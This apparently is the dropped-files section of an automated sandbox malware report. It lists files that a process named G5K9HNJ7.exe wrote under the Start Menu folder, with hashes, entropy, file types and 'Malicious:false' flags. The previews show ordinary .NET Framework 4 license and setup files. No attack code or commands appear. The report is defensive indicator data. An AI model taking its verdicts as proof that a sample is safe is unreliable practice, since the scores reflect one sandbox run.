                                                            Encrypted:false
                                                            SSDEEP:384:4w+optBSCVb5v6iMSsCtD7jjktDhHfLSGM3zD0q0Xt//Vvcinnl/06N9mGktJsIO:QqtBSCVb5v69SsuD7jwDkqmGeJsoON
                                                            MD5:B3B1A89458BEC6AF82C5386D26639B59
                                                            SHA1:D9320B8CC862F40C65668A40670081079B63CEA1
                                                            SHA-256:1EF312E8BE9207466FBFDECEE92BFC6C6B7E2DA61979B0908EAF575464E7B7A0
                                                            SHA-512:478CE08619490ED1ECDD8751B5F60DA1EE4AC0D08D9A97468C3F595AC4376FECA59E9C72DD9C83B00C8D78B298BE757C6F24A422B7BE8C041F780524844998BF
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17752
                                                            Entropy (8bit):5.196946497211754
                                                            Encrypted:false
                                                            SSDEEP:384:W9U6qxM8IJu5M/oZVQVWpyeWRLXci2jpvE:WIxMwLVWVMi2jpvE
                                                            MD5:28813510B82F45868B5BDC67FFF9C9FA
                                                            SHA1:696A06D1F7B13C20599C53E74969BDC99AB5D30A
                                                            SHA-256:EB0A73F6BFAF65FAA58440D57145709894E9A5354E840805EC02DCE153332249
                                                            SHA-512:A01A7C8147138125BBFF7D135FACF255A0284AFABD2BB28D5CB6E54C86A8F1A685855B5561584574A057D4FCFDEF630A10AD262495C58EA5DF974A3249787D9B
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1053
                                                            Category:dropped
                                                            Size (bytes):3865
                                                            Entropy (8bit):5.329033876405121
                                                            Encrypted:false
                                                            SSDEEP:96:rTBfv+/9TfHTGDXtZEOuAs50Y1EIF19VWMpDHvuKMLDBD+d54+QFEp5Tf+8K+l1S:5ffduAs591EIb9gOpqDoDZQmx2W2
                                                            MD5:E2F73097FC60F5347BAD1C1E93B2941B
                                                            SHA1:8564447AF45B488AC713D898405B759365662598
                                                            SHA-256:72860227092C38AE5E00E24C75E9B263E77BD2032EE597AABE408B9176448097
                                                            SHA-512:94ECD5BD5053A417BFF3E49C5E7B362843D2C850DA09D389161D4F4D98DE624473E0F143E6A088AB288AB4DA49B7910FFC80F77401009F560B60470FB13609B1
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (658), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):76818
                                                            Entropy (8bit):3.7161950547055933
                                                            Encrypted:false
                                                            SSDEEP:1536:bM8DL5YHRL87mlQg5IgrbGZzwOS8Frc+iI0jJNJ7rtRpUR:bM8DL5YHRL87mlQg5IgrbGZzwOS8FrcS
                                                            MD5:65E771FED28B924942A10452BBBF5C42
                                                            SHA1:586921B92D5FB297F35EFFC2216342DAC1AE2355
                                                            SHA-256:45E30569A756D9BCBC5F9DAE78BDA02751FD25E1C0AEE471CE112CB4464A6EE2
                                                            SHA-512:D014A2A96F3A5C487EF1CADDD69599DBEC15DA5AD689D68009F1CA4D5CB694105A7903F508476D6FFEC9D81386CB184DF6FC428D34F056190CEE30715514A8F7
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17752
                                                            Entropy (8bit):5.263298426482242
                                                            Encrypted:false
                                                            SSDEEP:384:Hfp2mDyEkEIb7/dscoGvXdBXbtRS0W0eW0LXci2jpvhPN:H1DyEkEIFscVXdBXbtRVsMi2jpvhl
                                                            MD5:357A1CBF08A83E657FFAE8639AC1212A
                                                            SHA1:384DF3D9DBBE27731785D92C257B7BA584FBE5E8
                                                            SHA-256:DD7337A6C67B39905A9B01C4212667F27EDFB68E86D1099E20EC37B03C51E7B9
                                                            SHA-512:67E47DF1E462A279C909B7B4255BEC4824554890CFF789BDF6691898A66E71DB007794476508F9290D95ACCE908109AA589A3A01A04125AEBB9EFBF67AEBF25F
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1254, default language ID 1055
                                                            Category:dropped
                                                            Size (bytes):3859
                                                            Entropy (8bit):5.120677849638168
                                                            Encrypted:false
                                                            SSDEEP:96:VSfjQOTqfRRTqfSD+vmScfQEz04jMpDLiIzhZLlZhD2:wfcFpcfEo4jOT2
                                                            MD5:D71A0D5B6CB13901CD35C036D395BE59
                                                            SHA1:B0F83CF648C2E84119A32AFD2E0EF409BB2047CE
                                                            SHA-256:A8850F6DBF56B6C55D255E81B15A3D17196EEE89FFBE41CDFCA19205628C1A7B
                                                            SHA-512:FE7C6E54014AD963F51850973F5AE5872FBA9843F1C20973F5E875008064F870A5217C2C9ADA3D92A3F1B2DF6318D5137814943D6295E72CF27343DF93B957E1
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (452), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):60684
                                                            Entropy (8bit):4.338517891382778
                                                            Encrypted:false
                                                            SSDEEP:384:4w7yHdhTgqbbT1HjWZez2jtKgst+7x0x8EM5NnqQivGXU4woZukC7FQKAuXR/4mn:dyjg2z2bXXwoZukC7FQKAuXRgcJf
                                                            MD5:10DA125EEABCBB45E0A272688B0E2151
                                                            SHA1:6C4124EC8CA2D03B5187BA567C922B6C3E5EFC93
                                                            SHA-256:1842F22C6FD4CAF6AD217E331B74C6240B19991A82A1A030A6E57B1B8E9FD1EC
                                                            SHA-512:D968ABD74206A280F74BF6947757CCA8DD9091B343203E5C2269AF2E008D3BB0A17FF600EB961DBF69A93DE4960133ADE8D606FB9A99402D33B8889F2D0DA710
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14168
                                                            Entropy (8bit):6.010838262457833
                                                            Encrypted:false
                                                            SSDEEP:192:rsLnUfwVWtTXjuQShyjK7tWUEW5IQKPnEtObMacxc8hjeyveCXMOV:4eCTFhMKZWUEW5ILXci2jpvP
                                                            MD5:407CDB7E1C2C862B486CDE45F863AE6E
                                                            SHA1:308AEEBEB1E1663ACA26CE880191F936D0E4E683
                                                            SHA-256:9DD9D76B4EF71188B09F3D074CD98B2DE6EA741530E4EA19D539AE3F870E8326
                                                            SHA-512:7B4F43FC24EB30C234F2713C493B3C13928C591C77A3017E8DD806A41CCFEDD53B0F748B5072052F8F9AC43236E8320B19D708903E3F06C59C6ED3C12722494E
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):5827
                                                            Entropy (8bit):4.418112026919231
                                                            Encrypted:false
                                                            SSDEEP:96:M5DBmf0jLTCLLgLTCLLmDjxrDT2k9rkKp7aDKaXzaWZMa/O9wzy6n/MpDTKTGptk:EmfJXoQkRGDtXeWZv/O9XmOdZzQJWBBi
                                                            MD5:4288C2541843F75C348D825FC8B94153
                                                            SHA1:E0DD8ED7BDB3C941A589361EE764F49A3619C264
                                                            SHA-256:C30A7597AA67E2847940E2C24F09B35C07B1EC759ADBCA7C8261141FC1ECCA92
                                                            SHA-512:7BA9991FE4EED625FE7BEF96A1D3AE70CB7616AAD034236D1A2B346A08B48280CB6C20D2B059DA9953919B0265125FE56DC5F4CC619AC653B4C1164ED564B359
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (665), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):80254
                                                            Entropy (8bit):3.5905984831890927
                                                            Encrypted:false
                                                            SSDEEP:384:4wdLPpRgMjLeUueUA48DYeUOqeUd/iboeuXWpFPYOAjw/BdgysR0AmhRod30J0qf:fenekeCeRuXWpFxgJMh230JMaWs
                                                            MD5:7FA9926A4BC678E32E5D676C39F8FB97
                                                            SHA1:BBA4311DD30261A9B625046F8A6EA215516C9213
                                                            SHA-256:A25EE75C78C24C50440AD7DE9929C6A6E1CC0629009DC0D01B90CBAC177DD404
                                                            SHA-512:E06423BC1EA50A566D341DC513828608E9B6611FEA81D33FCA471A38F6B2B61B556EA07A5DEC0830F3E87194975D87F267A5E5E1A2BE5E6A86B07C5BB2BDDCB6
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.195239987750812
                                                            Encrypted:false
                                                            SSDEEP:192:8ae5UfwxWr4KyGpTOSZmzmTssa8x91cvWp7eWYQKPnEtObMacxc8hjeyveCXgs:V32NAT7ZmzmYpqUvWp7eWYLXci2jpvas
                                                            MD5:58CB55FA4D9E2F62F675720B1269137D
                                                            SHA1:472F8E4982369C703C78091E66E33BF6B2A03F09
                                                            SHA-256:9C9E0ABFDB8065ECEC3420398DA687FAD4429F4CBF68B7082C8221925BF8D86B
                                                            SHA-512:123906A064033F37891DBB9C2A01A990AFD3C8447E38CDF66265784449FDD94806372A589A7DEA074830EB1DF7812E4877A1EE59171D37F1652167A03D2B961B
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2070
                                                            Category:dropped
                                                            Size (bytes):4015
                                                            Entropy (8bit):5.250694812846901
                                                            Encrypted:false
                                                            SSDEEP:96:r4IffB09DkTLGTHD28ygHx0LlHKe1rvGA9mE0Eyh+iH/OMpiKwIurpEpiT0T8x8w:VfB8ygHclqe1ruAYEBm+imOvurerV2
                                                            MD5:4518BE9A9BCA5BE1D8AC926A4B2C087D
                                                            SHA1:D089427D93EA726380E89ECF00127BD51A4DCFC1
                                                            SHA-256:D838ACF5ED559C58F623F73AF4902A13848502778EEA7AF585AC2E801D7C8C45
                                                            SHA-512:7BCF5248E36D98D74040B6AFB08CA62A3255E397A26FF6DCA9A8E42BADF71BC0005FD8FE8B3CA3A4896434823A9E3401EEC86EF60B1A6CE395CE21A710626478
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (457), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):60816
                                                            Entropy (8bit):4.3418522371704045
                                                            Encrypted:false
                                                            SSDEEP:384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiv:tbCWYFrewYTJCf
                                                            MD5:967A6D769D849C5ED66D6F46B0B9C5A4
                                                            SHA1:C0FF5F094928B2FA8B61E97639C42782E95CC74F
                                                            SHA-256:0BC010947BFF6EC1CE9899623CCFDFFD702EEE6D2976F28D9E06CC98A79CF542
                                                            SHA-512:219B13F1BEEB7D690AF9D9C7D98904494C878FBE9904F8CB7501B9BB4F48762F9D07C3440EFA0546600FF62636AC34CB4B32E270CF90CB47A9E08F9CB473030C
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14168
                                                            Entropy (8bit):5.9724110685335825
                                                            Encrypted:false
                                                            SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                            MD5:7C136B92983CEC25F85336056E45F3E8
                                                            SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                            SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                            SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 950, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):6309
                                                            Entropy (8bit):4.470827969332999
                                                            Encrypted:false
                                                            SSDEEP:96:/R8NRf8TTVKTu4LuTu4LrzZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIf2:/R4Rfm2NBZMjOfro2n6CA2
                                                            MD5:6F2F198B6D2F11C0CBCE4541900BF75C
                                                            SHA1:75EC16813D55AAF41D4D6E3C8D4948E548996D96
                                                            SHA-256:D7D3CFBE65FE62DFA343827811A8071EC54F68D72695C82BEC9D9037D4B4D27A
                                                            SHA-512:B1F5B812182C7A8BF1C1A8D0F616B44B0896F2AC455AFEE56C44522B458A8638F5C18200A8FB23B56DC1471E5AB7C66BE1BE9B794E12EC06F44BEEA4D9D03D6F
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg950\deff0\deflang1033\deflangfe1028{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset136 \'b7\'73\'b2\'d3\'a9\'fa\'c5\'e9;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars (<?[`\'7b\'a2\'47\'a2\'44?\'a1\'a5\'a1\'a7}{\*\fchars !'),.:\'3b>?]|\'7d\'a2\'46\'a1\'50?\'a1\'56\'a1\'58\'a1\'a6\'a1\'a8\'a1\'45\'a1\'4b}}..\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1028\f1\'b3\'6e\'c5\'e9\'bc\'57\'b8\'c9\'b1\'c2\'c5\'76\'b1\'f8\'b4\'da\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0\fs20 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\f2\par..\f0 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4 \lang1028\f1\'a5\'ce\'a4\'e1\'ba\'dd\'b3\'5d\'a9
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (656), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):79996
                                                            Entropy (8bit):3.5542515107748844
                                                            Encrypted:false
                                                            SSDEEP:1536:Xo/yYrDKRqvf+ffl0VMf/mfL94T+7j2JoiZq:Xo/yYrDKRqvf+feVMf/mfL94T+7j2Jrq
                                                            MD5:2D54FE70376DB0218E8970B28C1C4518
                                                            SHA1:83EE9AC93142751F23D5BB858F7264E27EA2EAB0
                                                            SHA-256:D17C5B638E2A4D43212D21A2052548C8D4909EB6410E30B8A951A292BCDBBEDD
                                                            SHA-512:20C0FB9A046911BC2D702AB321C3992262AC0F80F33DDDA5EC2CCAFE9EF07611774223369E0DC7CB91C9CDA1CBD65C598A7E1C914D6E6CA4B00205A16411BE30
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".E.l. .p.r.o.g.r.a.m.a. .d.e. .i.n.s.t.a.l.a.c.i...n. .n.o. .s.e. .p.u.e.d.e. .e.j.e.c.u.t.a.r. .e.n. .m.o.d.o. .d.e. .c.o.m.p.a.t.i.b.i.l.i.d.a.d... .P.a.r.a. .o.b.t.e.n.e.r. .m...s. .i.n.f.o.r.m.a.c.i...n.,. .v.e.a. .e.l. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.a.r.c.h.i.v.o. .L...a.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.182140892959793
                                                            Encrypted:false
                                                            SSDEEP:192:ZikgnUfwVWVCe8b1S2U85ZTYG1lmW+eWaQKPnEtObMacxc8hjXHUz1TrOYL18:Zlv6Lbg2zZTf1lmW+eWaLXci2jXHUx8
                                                            MD5:B057315A8C04DF29B7E4FD2B257B75F4
                                                            SHA1:D674D066DF8D1041599FCBDB3BA113600C67AE93
                                                            SHA-256:51B174AE7EE02D8E84C152D812E35F140A61814F3AECD64E0514C3950060E9FE
                                                            SHA-512:F1CD510182DE7BBF8D45068D1B3F72DE58C7B419EFC9768765DF6C180AB3E2D94F3C058143095A66C05BCB70B589D1A5061E5FEE566282E5DB49FFBDEA3C672F
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3069
                                                            Entropy (8bit):5.138349598257165
                                                            Encrypted:false
                                                            SSDEEP:48:MTN3nfZQZXRFOTfyTZQDeK9xxMFcJ55HsUXHNX/RgMzsrMpDgLmqIy3W0b8EwKg3:MTBfZQZhoTfyTZQDeQxpDHsOH1ZvoMp9
                                                            MD5:D40C65F632063E5CDFEF104E324D0AD4
                                                            SHA1:49FABA625BADF413763BD913EDB62510D3790E98
                                                            SHA-256:AAD96E7F4037E977997C630DEC015ECF09CF73C1F5B73F84944E60B309EAAB66
                                                            SHA-512:6A948FA1602E517021C98861B0DF12FCB707FBBEBF094DDE96D9E60CC7DED30B07C1BF6CA8541117A362B5EB8703D61051CF187083C91076E0AD235CF72B7237
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang3082\b\f0\fs20 T\'c9RMINOS DE LICENCIA COMPLEMENTARIOS DEL SOFTWARE DE MICROSOFT\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 PARA EL SISTEMA OPERATIVO MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PARA EL SISTEMA OPERATIVO MICROSOFT WINDOWS\par..Y PAQUETES DE IDIOMA ASSOCIADOS\f1\par..\pard\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (o, en funci\'f3n del lugar en el que resida, una de sus filiales) le concede la licencia para este complemento. Si obtiene la licencia para utilizar el sistema operativo Microsoft Windows (al que se aplica este suplemento), en adelante el "software", podr\'e1 usar e
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):201796
                                                            Entropy (8bit):3.4097027044493644
                                                            Encrypted:false
                                                            SSDEEP:384:wYQH0RbAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKMNGIe9bs:w2RbYoVQTLTQTDFdPknZ13GpPcbrIl
                                                            MD5:EB9D318BBEA1F384A78EDE1D1051F47D
                                                            SHA1:ECD4391FE00D9BB73964456AF15FCD94DB676CC0
                                                            SHA-256:73B29A019C1821304C65A30F338DB2747B950EBCC0E65C02CFF39A0166316A72
                                                            SHA-512:91716D9A78852DB0ABE526A08C73C8349EEB997AD493A8F5B043E45A4A7AADB15FEBFBBC42641AEEC445BC36B0054A4520E051A0CE4CADD237510033F3A9BCE0
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. .4. .C.l.i.e.n.t. .P.r.o.f.i.l.e. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".4...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".O.S.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .<.B.l.o.c.k.i.n.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):39042
                                                            Entropy (8bit):3.1132391675648923
                                                            Encrypted:false
                                                            SSDEEP:768:24URyd5vssgP7ZgZ/vSguJQvFQXvDINJh6F8hZkV1GO0N0phUl9eu+dODOOODOtK:24URyd5vsTPuZXQYQLIN/6F8hZkV1GOv
                                                            MD5:D7A2E90DD9DF6F93FD4B7354F8EC2B0D
                                                            SHA1:A792C41B62796513E312F19DEE91447B9280B23B
                                                            SHA-256:1D1590EB48E66646ED7917A76302862AC87E6651C841A808CF3FE797B9E697F6
                                                            SHA-512:A3431DA5517428B69D4481A98AB6CDA6849F3B1B33DD44CC2EDFD76DDBF51BD2B45B3C4ED21293F7FEE2789281B8CF5120EF83F11F99DE6FC18C0E3FE5D1D9D5
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):16118
                                                            Entropy (8bit):3.6434775915277604
                                                            Encrypted:false
                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                            Malicious:false
                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 13 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):88533
                                                            Entropy (8bit):7.210526848639953
                                                            Encrypted:false
